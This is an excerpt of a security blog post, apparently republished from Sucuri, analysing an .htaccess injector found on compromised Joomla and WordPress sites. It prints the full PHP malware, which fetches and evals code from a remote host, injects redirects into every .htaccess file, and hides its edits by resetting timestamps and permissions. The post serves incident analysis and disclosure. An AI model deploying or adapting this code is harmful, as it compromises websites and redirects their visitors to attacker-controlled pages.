.htaccess Injector on Joomla and WordPress Websites

.htaccess Injector on Joomla and WordPress Websites

During the process of investigating one of our incident response cases, we found an .htaccess code injection. It had been widely spread on the website, injected into all .htaccess files and redirecting visitors to the http[:]//portal-f[.]pw/XcTyTp advertisement website.

Taking a Look at the .htaccess Injector Code

Below is the code within the ./modules/mod_widgetread_twitt/ index.php file on a Joomla website. This code is responsible for injecting the malicious redirects into the .htaccess files:

<?php echo’Wordpress ‘;$htac=file_get_contents(‘hXXp://recaptcha-in[.]pw/bash/x’);$fl=”./.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”\r\n”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents(‘http://recaptcha-in.pw/bash/x’);$fl=”../.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”\r\n”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents(‘http://recaptcha-in.pw/bash/x’);$fl=”../../.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”\r\n”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents(‘http://recaptcha-in.pw/bash/x’);$fl=”../../../.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”\r\n”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents(‘http://recaptcha-in.pw/bash/x’);$fl=”../../../../.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”\r\n”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents(‘http://recaptcha-in.pw/bash/x’);$fl=”../../../../../.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”\r\n”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};echo’ ‘;eval(file_get_contents(‘hXXp://recaptcha-in[.]pw/bash/include/xtaccess’));echo’ ‘;set_time_limit(120);$fileName=”.htaccess”;$injectData=”http://recaptcha-in.pw/bash/x”;$filesArray=array();function FindFiles($dir,&$fArray,&$searchFile){if($curdir=opendir($dir)){while(false!==($file=readdir($curdir))){if(($file==”.”)||($file==”..”))continue;$filePath=$dir.DIRECTORY_SEPARATOR.$file;if(is_file($filePath))if($file!=$searchFile)continue;if(is_dir($filePath)){FindFiles($filePath,$fArray,$searchFile);}else{array_push($fArray,$filePath);}}closedir($curdir);}return true;}FindFiles($_SERVER[“DOCUMENT_ROOT”],$filesArray,$fileName);if(count($filesArray)>0){$injectData=file_get_contents($injectData);if(!empty($injectData)){foreach($filesArray as&$value){chmod($value,0777);if(is_writable($value)){$fileDate=filemtime($value);$fileSource=file_get_contents($value);if(!strstr($fileSource,$injectData)){$fileSource=$injectData.”\r\n”.$fileSource;file_put_contents($value,$fileSource);touch($value,$fileDate);}}chmod($value,0444);}}};echo’

END’;

This code is searching for an .htaccess file.

Continue reading .htaccess Injector on Joomla and WordPress Websites at Sucuri Blog.

Read more: .htaccess Injector on Joomla and WordPress Websites

Story added 23. May 2019, content source with full text you can find at link above.